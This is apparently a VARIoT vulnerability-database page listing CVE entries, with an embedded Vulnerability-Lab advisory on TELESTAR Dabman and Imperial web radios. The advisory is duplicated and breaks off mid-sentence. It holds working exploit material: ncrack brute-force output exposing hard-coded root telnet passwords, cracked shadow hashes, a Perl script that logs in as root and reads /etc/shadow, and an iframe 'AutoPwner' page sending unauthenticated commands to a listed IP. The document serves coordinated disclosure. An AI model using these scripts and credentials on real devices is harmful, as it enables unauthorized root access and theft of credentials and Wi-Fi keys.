VARIoT IoT vulnerabilities database
| VAR-201911-0833 | CVE-2019-5228 | plural Huawei Vulnerability related to competition in smartphone products |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: HIGH |
Certain detection module of P30, P30 Pro, Honor V20 smartphone whith Versions earlier than ELLE-AL00B 9.1.0.193(C00E190R1P21), Versions earlier than VOGUE-AL00A 9.1.0.193(C00E190R1P12), Versions earlier than Princeton-AL10B 9.1.0.233(C00E233R4P3) have a race condition vulnerability. The system does not lock certain function properly, when the function is called by multiple processes could cause out of bound write. An attacker tricks the user into installing a malicious application, successful exploit could cause malicious code execution. Huawei P30 and others are all smartphones of China's Huawei company. The vulnerability stems from the fact that the system does not lock the function
| VAR-201909-1448 | CVE-2019-0361 | SAP Supplier Relationship Management Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
SAP Supplier Relationship Management (Master Data Management Catalog - SRM_MDM_CAT, before versions 3.73, 7.31, 7.32) does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability
| VAR-201909-0498 | CVE-2019-1302 | ASP.NET Core Vulnerability in which privileges are elevated |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
An elevation of privilege vulnerability exists when a ASP.NET Core web application, created using vulnerable project templates, fails to properly sanitize web requests, aka 'ASP.NET Core Elevation Of Privilege Vulnerability'. The vendor ASP.NET Core As a privilege escalation vulnerability.Your privilege may be elevated. Microsoft ASP.NET Core is a cross-platform open source framework from Microsoft Corporation in the United States. The framework is used to build cloud-based applications such as web applications, IoT applications, and mobile backends.
Microsoft ASP.NET Core version 2.1, 2.2, and 3.0 have an input validation error vulnerability. An attacker could use this vulnerability to run a script in the security context of the current user
| VAR-201909-1446 | CVE-2019-0356 | SAP NetWeaver Process Integration Runtime Workbench Vulnerable to information disclosure |
CVSS V2: 4.0 CVSS V3: 4.3 Severity: MEDIUM |
Under certain conditions SAP NetWeaver Process Integration Runtime Workbench – MESSAGING and SAP_XIAF (before versions 7.31, 7.40, 7.50) allows an attacker to access information which would otherwise be restricted
| VAR-202001-0760 | CVE-2019-13521 | Rockwell Automation Arena Simulation Software Vulnerability in |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: HIGH |
A maliciously crafted program file opened by an unsuspecting user of Rockwell Automation Arena Simulation Software version 16.00.00 and earlier may result in the limited exposure of information related to the targeted workstation. Rockwell Automation has released version 16.00.01 of Arena Simulation Software to address the reported vulnerabilities. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of DOE files. Crafted data in a DOE file can allow execution of arbitrary commands without prompting the user. An attacker can leverage this vulnerability to execute code in the context of the current user
| VAR-202001-0758 | CVE-2019-13519 | Rockwell Automation Arena Simulation Software Vulnerabilities in type mixing |
CVSS V2: 6.8 CVSS V3: 7.8 Severity: HIGH |
A maliciously crafted program file opened by an unsuspecting user of Rockwell Automation Arena Simulation Software version 16.00.00 and earlier may result in the limited exposure of information related to the targeted workstation. Rockwell Automation has released version 16.00.01 of Arena Simulation Software to address the reported vulnerabilities. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of DOE files. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process
| VAR-201909-1007 | CVE-2019-13473 | plural TELESTAR Vulnerability in using hard-coded credentials in product |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have an undocumented TELNET service within the BusyBox subsystem, leading to root access. plural TELESTAR The product contains a vulnerability involving the use of hard-coded credentials.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Dabman & Imperial Web Radio Devices is a radio device.
Dabman & Imperial Web Radio Devices has an authentication bypass vulnerability that allows an attacker to bypass the authentication mechanism and gain unauthorized access. This could lead to further attacks. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components. Document Title:
===============
Dabman & Imperial (i&d) Web Radio Devices - Undocumented Telnet Backdoor
& Command Execution Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2183
Video: https://www.vulnerability-lab.com/get_content.php?id=2190
Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13473
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13474
CVE-ID:
=======
CVE-2019-13473
Release Date:
=============
2019-09-09
Vulnerability Laboratory ID (VL-ID):
====================================
2183
Common Vulnerability Scoring System:
====================================
9.4
Vulnerability Class:
====================
Multiple
Current Estimated Price:
========================
5.000€ - 10.000€
Product & Service Introduction:
===============================
Since 1993, TELESTAR has been synonymous with quality and a very good
price/performance ratio in the consumer electronics segment.
TELESTAR-DIGITAL GmbH distributes high-quality reception technology for
digital TV reception via satellite (DVB-S), cable (DVBC)
or terrestrial (DVB-T) from its headquarters in the Vulkaneifel region
of Germany. The product portfolio includes digital receivers
and the latest generation of television sets as well as modern
distribution and single-cable technology, satellite to IP reception
solutions and radio transmission systems. The product range is rounded
off by Germany's most comprehensive range of accessories
for digital television reception.
(Copy of the Homepage: https://www.xing.com/companies/telestar-digitalgmbh )
Abstract Advisory Information:
==============================
The vulnerability laboratory research team discovered multiple
vulnerabilities in the dabman and imperial web radio devices series (typ
d & i).
Vulnerability Disclosure Timeline:
==================================
2018-06-01: Researcher Notification & Coordination (Security Researcher)
2018-06-02: Vendor Notification (Telestar Digital Data Security Department)
2018-06-07: Vendor Response/Feedback (Telestar Digital Data Security
Department)
2018-08-30: Vendor Fix/Patch (Service Developer Team)
2019-09-08: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Authentication Type:
====================
Pre auth - no privileges
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Coordinated Disclosure
Technical Details & Description:
================================
1.1
The dabman and imperial manufactured web radio series (typ d & i)
suffers from a weak password vulnerability.
The vulnerabilites allows local and remote attackers to compromise the
web radios full embedded linux busybox os.
The vulnerability is located within an undocumented telnet service
(telnetd) of the linux busybox and is
turned permanently on. The telnetd service uses weak passwords with
hardcoded credentials on the local embedded
linux busybox of the internet radio devices. The telnet password can be
cracked by usage of simple manual password
bruteforce technics or by basic automated attacks with scripts (exp.
ncrack). After receiving the password the
remote or local network attacker can unauthorized login to the internet
radio device to use the embedded linux
busybox operating system.
After the attacker has been logged in as root user, he can open the
/etc/ path to cat gshadow, shadow and the conf files.
At the end the attacker has finally full root access on the busybox
(telnetd), he can access the web-server (httpd) as
admin and see the wireless lan + unencrypted key in ./flash/ - wifi.cfg.
A demo exploit poc is available in the wild.
The vulnerability is located httpd web-server communcation on port 80
and 8080. Local and remote attackers can send basic GET
commands with basic command line tools (exp. curl or modhttp) to modify
or manipulate http requests. The attacker can also capture
the http airmusic commands to reverse engineer the radio device for
unauthorized interactions. The system has no protection mechanism
to block unauthorized transmit of commands. The web radio as well not
owns an auth or reminder mechanism to ensure only allowed or
trusted sources can transmit the commands (client, system, mac , auth ...).
For security demonstration or to reproduce follow the provided
information and steps below to continue.
Nmap Portscan
Scanning R-MAVERIC-EMAC_1_01_018 (93.234.141.215) [1000 ports]
Discovered open port 8080/tcp on 93.234.141.215
Discovered open port 80/tcp on 93.234.141.215
Discovered open port 23/tcp on 93.234.141.215
Completed SYN Stealth Scan at 14:48, 13.38s elapsed (1000 total ports)
Initiating Service scan at 14:48
Scanning 3 services on R-MAVERIC-EMAC_1_01_018 (93.234.141.215)
Completed Service scan at 14:48, 6.20s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against R-MAVERIC-EMAC_1_01_018
(93.234.141.215)
NSE: Script scanning 93.234.141.215.
Initiating NSE at 14:48
Completed NSE at 14:49, 30.61s elapsed
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Nmap scan report for R-MAVERIC-EMAC_1_01_018 (93.234.141.215)
Host is up (0.010s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
23/tcp open telnet security DVR telnetd (many brands)
80/tcp open tcpwrapped
|_http-title: AirMusic
8080/tcp open http BusyBox httpd 1.13
| http-methods:
|_ Supported Methods: GET
|_http-title: 404 Not Found
MAC Address: 7C:C7:09:FD:3B:56 (Shenzhen Rf-link Technology)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.16 - 2.6.35 (embedded)
Uptime guess: 5.967 days (since Sun Jun 23 15:36:08 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=197 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NCrack [telnetd] (ncrack -v --user root [IP]:[PORT])
C:Program Files (x86)Ncrack>ncrack -v --user root 93.234.141.215:23
Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-06-29 18:21
Mitteleuropõische Sommerzeit
Discovered credentials on telnet://93.234.141.215:23 'root' 'password'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password1'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password2'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password123'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password12'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password3'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password!'
telnet://93.234.141.215:23 finished. Too many failed attemps.
Discovered credentials for telnet on 93.234.141.215 23/tcp:
93.234.141.215 23/tcp telnet: 'root' 'password'
93.234.141.215 23/tcp telnet: 'root' 'password1'
93.234.141.215 23/tcp telnet: 'root' 'password2'
93.234.141.215 23/tcp telnet: 'root' 'password123'
93.234.141.215 23/tcp telnet: 'root' 'password12'
93.234.141.215 23/tcp telnet: 'root' 'password3'
93.234.141.215 23/tcp telnet: 'root' 'password!'
Ncrack done: 1 service scanned in 273.29 seconds.
Probes sent: 1117 | timed-out: 50 | prematurely-closed: 117
Ncrack finished.
System:
BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash)
Kernel:
9)20151217_M8_TFT_7601_Kernel
OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC:
(GNU) 4.2.1GCC: (GNU) 4.2.1GCC:
(GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian
prerelease)Aaeabi.shstrtab.init.text.fini.
rodata.ARM.extab.ARM.exidx.eh_frame.init_array.
fini_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes
Built-in commands:
. : [ [[ bg break cd chdir continue echo eval exec exit export
false fg hash help jobs kill local printf pwd read readonly return
set shift source test times trap true type ulimit umask unset wait
Currently defined functions:
[, [[, ash, cat, chmod, cp, date, df, echo, free, ftpget, ftpput,
gunzip, httpd, ifconfig, init, insmod, kill, killall, linuxrc,
login,
ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod,
route,
run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc,
udhcpd, umount, unlzma, usleep, zcat
Username: root
Password: password & password!
shadow
root:r.BF8RVw56BOA:1:0:99999:7::: (decrypted: password & mldonkey)
ftp:!:0:::::: (decrypted: empty/blank)
usb:w.rW11jv2dmM2:13941:::::: (decrypted: winbond)
gshadow
root:::root,mldonkey
PoC: Exploit
use Net::Telnet ();
use Cwd;
$file="inputLog.txt";
$ofile="outputlog.txt";
# For local network change to localhost or local ip
@hosts = ("93.234.141.215");
foreach $hostip (sort @hosts)
{
$t = new Net::Telnet (Timeout => 10,
Input_log => $file,
Prompt => "/>/");
print "nnConnecting to undocumented Telnet Service of Imperial or
Dabman Web Radio Service: $hostip ...n";
print "nnAffected Models: Bobs Rock Radio, D10, i30, D30iS, i110, i150,
i200, i200-cd, i400, i450, i500-bt, i600n";
$t->open("$hostip");
$t->login("root","password");
my @lines = $t->cmd('cat /etc/shadow');
print "$hostip: Directories:n";
print "@lines n";
$t->close;
}
1.2 AirMusic Unauthenticated Command Execution (httpd)
The security vulnerability can be exploited by local and remote
attackers without user interaction or privileged user account.
For security demonstration or to reproduce follow the provided
information and steps below to continue.
AirMusic Status Interface: http://93.234.141.215:80
Web-Server HTTPD UIData Path: http://93.234.141.215:8080
Note: Attacks can be performed in the local network (Localhost:80) or
remotly by requesting the url remote ip adress (93.234.141.215) +
forwarded remote port(Standard :23).
Get device name from Device
http://93.234.141.215:80/irdevice.xml
Set device name
http://93.234.141.215:80/set_dname?name=PWND
Set boot-logo (HTTP URL, requirement: JPG)
http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg
Display or retrieve channel logo
http://93.234.141.215:80:8080/playlogo.jpg
Changing the main menu with the selected language
http://93.234.141.215:80/init?language=us
Play stream
http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME
Save audio file as message
http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1
Recall channel hotkeys
http://93.234.141.215:80/hotkeylist
Current playback data
http://93.234.141.215:80/playinfo
Set volume from 0-31 & mute function
http://93.234.141.215:80/setvol?vol=10&mute=0
Reset
http://93.234.141.215:80/back
Set stop
http://93.234.141.215:80/stop
Activate all back
http://93.234.141.215:80/exit
Send keystroke combo
http://93.234.141.215:80/Sendkey?key=3
PoC: Exploit
<html>
<head><body>
<title>Dabman & Imerpial - HTML AutoPwner</title>
<iframe src=http://93.234.141.215:80/set_dname?name=PWND></iframe>
<iframe
src=http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg></iframe>
<iframe
src=http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME></iframe>
<iframe
src=http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1></iframe>
</body></head>
<html>
PoC: Checker for Modifications
#!/usr/bin/perl
use strict;
use warnings;
use LWP::Simple;
my $url1 = 'http://93.234.141.215:80/';
my $source1 = get( $url1 );
my $url2 = 'http://93.234.141.215:80/';
my $source2 = get( $url2 );
print $source1;
print $source1;
Solution - Fix & Patch:
=======================
A fresh updated version is available by the manufacturer telestar to
resolve the vulnerabilities in all i & d series products.
It is recommended to install the updates as quick as possible to ensure
the digital security.
1. Set the device to the factory setting
2. Select language
3. Switch off the device
4. Switch on the device
5. Network setup
6. Wait for "New Software" message
7. Press OK to start the update
8. Updated Version: TN81HH96-g102h-g103**a*-fb21a-3624
Security Risk:
==============
The security risk of the vulnerabilities in the online web radio with
wifi and user interface are estimated as critical.
The vulnerability can be exploited by local attackers in a network or by
remote attackers without user interaction or
further privileged user accounts. The potential of the issue being
exploited in thousends of end user devices all over europe
is estimated as high. The issue has the potential that could be used by
remote attackers for spreading randomware / malware,
mass defacements, compromises for further linux network attacks or being
part of a criminal acting iot botnet.
Credits & Authors:
==================
Benjamin K.M. [VULNERABILITY LAB - CORE RESEARCH TEAM] -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2019 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
.
It uses the firmware UIProto, different versions of which can also be
found in many other radios. The firmware offers a rudimentary web API that can be reached on the
local network on port 80. This API is completely unauthenticated,
allowing anyone to control the radio over the local network. (already
known as CVE-2019-13474, but relevant for the other two findings) [1]
[2] [3]
2. The web UI does not encode user input, resulting in a XSS
vulnerability, e.g. The firmware crashes when sending a device name longer than 84
characters. Some parts of the firmware will recover afterwards and music
will play again after a few seconds, but the service on port 80 remains
borked until the radio is reset using the switch on the back. This may
or may not be a memory corruption vulnerability. I don't feel like
analyzing this any further, but it certainly looks kinda fucked. These reports also mention
other devices that are possibly affected by this as well.
Also, if anyone knows how to re-enable telnetd on the patched version of
UIProto, please let me know!
Love,
naphthalin
[1] https://github.com/kayrus/iradio
[2] https://sites.google.com/site/tweakradje/devices/abeo-internet-radio
[3]
https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution
| VAR-201909-1008 | CVE-2019-13474 | plural TELESTAR Authentication vulnerabilities in products |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
TELESTAR Bobs Rock Radio, Dabman D10, Dabman i30 Stereo, Imperial i110, Imperial i150, Imperial i200, Imperial i200-cd, Imperial i400, Imperial i450, Imperial i500-bt, and Imperial i600 TN81HH96-g102h-g102 devices have insufficient access control for the /set_dname, /mylogo, /LocalPlay, /irdevice.xml, /Sendkey, /setvol, /hotkeylist, /init, /playlogo.jpg, /stop, /exit, /back, and /playinfo commands. plural TELESTAR The product contains authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could exploit this vulnerability to execute arbitrary commands on the system. Document Title:
===============
Dabman & Imperial (i&d) Web Radio Devices - Undocumented Telnet Backdoor
& Command Execution Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2183
Video: https://www.vulnerability-lab.com/get_content.php?id=2190
Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13473
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13474
CVE-ID:
=======
CVE-2019-13473
Release Date:
=============
2019-09-09
Vulnerability Laboratory ID (VL-ID):
====================================
2183
Common Vulnerability Scoring System:
====================================
9.4
Vulnerability Class:
====================
Multiple
Current Estimated Price:
========================
5.000€ - 10.000€
Product & Service Introduction:
===============================
Since 1993, TELESTAR has been synonymous with quality and a very good
price/performance ratio in the consumer electronics segment.
TELESTAR-DIGITAL GmbH distributes high-quality reception technology for
digital TV reception via satellite (DVB-S), cable (DVBC)
or terrestrial (DVB-T) from its headquarters in the Vulkaneifel region
of Germany. The product portfolio includes digital receivers
and the latest generation of television sets as well as modern
distribution and single-cable technology, satellite to IP reception
solutions and radio transmission systems. The product range is rounded
off by Germany's most comprehensive range of accessories
for digital television reception.
(Copy of the Homepage: https://www.xing.com/companies/telestar-digitalgmbh )
Abstract Advisory Information:
==============================
The vulnerability laboratory research team discovered multiple
vulnerabilities in the dabman and imperial web radio devices series (typ
d & i).
Vulnerability Disclosure Timeline:
==================================
2018-06-01: Researcher Notification & Coordination (Security Researcher)
2018-06-02: Vendor Notification (Telestar Digital Data Security Department)
2018-06-07: Vendor Response/Feedback (Telestar Digital Data Security
Department)
2018-08-30: Vendor Fix/Patch (Service Developer Team)
2019-09-08: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Authentication Type:
====================
Pre auth - no privileges
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Coordinated Disclosure
Technical Details & Description:
================================
1.1
The dabman and imperial manufactured web radio series (typ d & i)
suffers from a weak password vulnerability.
The vulnerabilites allows local and remote attackers to compromise the
web radios full embedded linux busybox os.
The vulnerability is located within an undocumented telnet service
(telnetd) of the linux busybox and is
turned permanently on. The telnetd service uses weak passwords with
hardcoded credentials on the local embedded
linux busybox of the internet radio devices. The telnet password can be
cracked by usage of simple manual password
bruteforce technics or by basic automated attacks with scripts (exp.
ncrack). After receiving the password the
remote or local network attacker can unauthorized login to the internet
radio device to use the embedded linux
busybox operating system.
After the attacker has been logged in as root user, he can open the
/etc/ path to cat gshadow, shadow and the conf files.
At the end the attacker has finally full root access on the busybox
(telnetd), he can access the web-server (httpd) as
admin and see the wireless lan + unencrypted key in ./flash/ - wifi.cfg.
A demo exploit poc is available in the wild.
The vulnerability allows local and remote attackers unauthorized and
unauthenticated send commands to comprimise the web radio devices.
The vulnerability is located httpd web-server communcation on port 80
and 8080. Local and remote attackers can send basic GET
commands with basic command line tools (exp. curl or modhttp) to modify
or manipulate http requests. The attacker can also capture
the http airmusic commands to reverse engineer the radio device for
unauthorized interactions. The system has no protection mechanism
to block unauthorized transmit of commands. The web radio as well not
owns an auth or reminder mechanism to ensure only allowed or
trusted sources can transmit the commands (client, system, mac , auth ...).
For security demonstration or to reproduce follow the provided
information and steps below to continue.
Nmap Portscan
Scanning R-MAVERIC-EMAC_1_01_018 (93.234.141.215) [1000 ports]
Discovered open port 8080/tcp on 93.234.141.215
Discovered open port 80/tcp on 93.234.141.215
Discovered open port 23/tcp on 93.234.141.215
Completed SYN Stealth Scan at 14:48, 13.38s elapsed (1000 total ports)
Initiating Service scan at 14:48
Scanning 3 services on R-MAVERIC-EMAC_1_01_018 (93.234.141.215)
Completed Service scan at 14:48, 6.20s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against R-MAVERIC-EMAC_1_01_018
(93.234.141.215)
NSE: Script scanning 93.234.141.215.
Initiating NSE at 14:48
Completed NSE at 14:49, 30.61s elapsed
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Nmap scan report for R-MAVERIC-EMAC_1_01_018 (93.234.141.215)
Host is up (0.010s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
23/tcp open telnet security DVR telnetd (many brands)
80/tcp open tcpwrapped
|_http-title: AirMusic
8080/tcp open http BusyBox httpd 1.13
| http-methods:
|_ Supported Methods: GET
|_http-title: 404 Not Found
MAC Address: 7C:C7:09:FD:3B:56 (Shenzhen Rf-link Technology)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.16 - 2.6.35 (embedded)
Uptime guess: 5.967 days (since Sun Jun 23 15:36:08 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=197 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NCrack [telnetd] (ncrack -v --user root [IP]:[PORT])
C:Program Files (x86)Ncrack>ncrack -v --user root 93.234.141.215:23
Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-06-29 18:21
Mitteleuropõische Sommerzeit
Discovered credentials on telnet://93.234.141.215:23 'root' 'password'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password1'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password2'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password123'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password12'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password3'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password!'
telnet://93.234.141.215:23 finished. Too many failed attemps.
Discovered credentials for telnet on 93.234.141.215 23/tcp:
93.234.141.215 23/tcp telnet: 'root' 'password'
93.234.141.215 23/tcp telnet: 'root' 'password1'
93.234.141.215 23/tcp telnet: 'root' 'password2'
93.234.141.215 23/tcp telnet: 'root' 'password123'
93.234.141.215 23/tcp telnet: 'root' 'password12'
93.234.141.215 23/tcp telnet: 'root' 'password3'
93.234.141.215 23/tcp telnet: 'root' 'password!'
Ncrack done: 1 service scanned in 273.29 seconds.
Probes sent: 1117 | timed-out: 50 | prematurely-closed: 117
Ncrack finished.
System:
BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash)
Kernel:
9)20151217_M8_TFT_7601_Kernel
OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC:
(GNU) 4.2.1GCC: (GNU) 4.2.1GCC:
(GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian
prerelease)Aaeabi.shstrtab.init.text.fini.
rodata.ARM.extab.ARM.exidx.eh_frame.init_array.
fini_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes
Built-in commands:
. : [ [[ bg break cd chdir continue echo eval exec exit export
false fg hash help jobs kill local printf pwd read readonly return
set shift source test times trap true type ulimit umask unset wait
Currently defined functions:
[, [[, ash, cat, chmod, cp, date, df, echo, free, ftpget, ftpput,
gunzip, httpd, ifconfig, init, insmod, kill, killall, linuxrc,
login,
ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod,
route,
run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc,
udhcpd, umount, unlzma, usleep, zcat
Username: root
Password: password & password!
shadow
root:r.BF8RVw56BOA:1:0:99999:7::: (decrypted: password & mldonkey)
ftp:!:0:::::: (decrypted: empty/blank)
usb:w.rW11jv2dmM2:13941:::::: (decrypted: winbond)
gshadow
root:::root,mldonkey
PoC: Exploit
use Net::Telnet ();
use Cwd;
$file="inputLog.txt";
$ofile="outputlog.txt";
# For local network change to localhost or local ip
@hosts = ("93.234.141.215");
foreach $hostip (sort @hosts)
{
$t = new Net::Telnet (Timeout => 10,
Input_log => $file,
Prompt => "/>/");
print "nnConnecting to undocumented Telnet Service of Imperial or
Dabman Web Radio Service: $hostip ...n";
print "nnAffected Models: Bobs Rock Radio, D10, i30, D30iS, i110, i150,
i200, i200-cd, i400, i450, i500-bt, i600n";
$t->open("$hostip");
$t->login("root","password");
my @lines = $t->cmd('cat /etc/shadow');
print "$hostip: Directories:n";
print "@lines n";
$t->close;
}
1.2 AirMusic Unauthenticated Command Execution (httpd)
The security vulnerability can be exploited by local and remote
attackers without user interaction or privileged user account.
For security demonstration or to reproduce follow the provided
information and steps below to continue.
AirMusic Status Interface: http://93.234.141.215:80
Web-Server HTTPD UIData Path: http://93.234.141.215:8080
Note: Attacks can be performed in the local network (Localhost:80) or
remotly by requesting the url remote ip adress (93.234.141.215) +
forwarded remote port(Standard :23).
Get device name from Device
http://93.234.141.215:80/irdevice.xml
Set device name
http://93.234.141.215:80/set_dname?name=PWND
Set boot-logo (HTTP URL, requirement: JPG)
http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg
Display or retrieve channel logo
http://93.234.141.215:80:8080/playlogo.jpg
Changing the main menu with the selected language
http://93.234.141.215:80/init?language=us
Play stream
http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME
Save audio file as message
http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1
Recall channel hotkeys
http://93.234.141.215:80/hotkeylist
Current playback data
http://93.234.141.215:80/playinfo
Set volume from 0-31 & mute function
http://93.234.141.215:80/setvol?vol=10&mute=0
Reset
http://93.234.141.215:80/back
Set stop
http://93.234.141.215:80/stop
Activate all back
http://93.234.141.215:80/exit
Send keystroke combo
http://93.234.141.215:80/Sendkey?key=3
PoC: Exploit
<html>
<head><body>
<title>Dabman & Imerpial - HTML AutoPwner</title>
<iframe src=http://93.234.141.215:80/set_dname?name=PWND></iframe>
<iframe
src=http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg></iframe>
<iframe
src=http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME></iframe>
<iframe
src=http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1></iframe>
</body></head>
<html>
PoC: Checker for Modifications
#!/usr/bin/perl
use strict;
use warnings;
use LWP::Simple;
my $url1 = 'http://93.234.141.215:80/';
my $source1 = get( $url1 );
my $url2 = 'http://93.234.141.215:80/';
my $source2 = get( $url2 );
print $source1;
print $source1;
Solution - Fix & Patch:
=======================
A fresh updated version is available by the manufacturer telestar to
resolve the vulnerabilities in all i & d series products.
It is recommended to install the updates as quick as possible to ensure
the digital security.
1. Set the device to the factory setting
2. Select language
3. Switch off the device
4. Switch on the device
5. Network setup
6. Wait for "New Software" message
7. Press OK to start the update
8. Updated Version: TN81HH96-g102h-g103**a*-fb21a-3624
Security Risk:
==============
The security risk of the vulnerabilities in the online web radio with
wifi and user interface are estimated as critical.
The vulnerability can be exploited by local attackers in a network or by
remote attackers without user interaction or
further privileged user accounts. The potential of the issue being
exploited in thousends of end user devices all over europe
is estimated as high. The issue has the potential that could be used by
